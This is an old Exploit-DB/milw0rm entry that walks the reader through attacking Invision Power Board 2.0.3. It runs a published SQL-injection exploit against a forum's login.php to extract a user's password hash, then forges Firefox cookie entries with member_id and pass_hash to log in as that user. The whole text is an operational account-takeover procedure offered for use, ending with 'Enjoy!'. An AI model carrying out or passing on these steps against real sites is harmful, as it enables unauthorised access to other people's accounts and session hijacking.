Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

Author: Danica Jones
type: webapps
platform: php
port: 
date_added: 2005-05-26 
date_updated: 2018-01-18 
verified: 1 
codes: CVE-2005-1598;OSVDB-16297 
tags: 
aliases:  
screenshot_url:  
application_url: 

# danica jones <danica6699@gmail.com>

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
     a. perl -MCPAN -e 'shell'
     b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl http://forums.example.com 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"

Add the following entries:

forums.example.com        FALSE        /        FALSE		1148708747	  member_id        1
forums.example.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and login to http://forums.example.com

Enjoy!


# milw0rm.com [2005-05-27]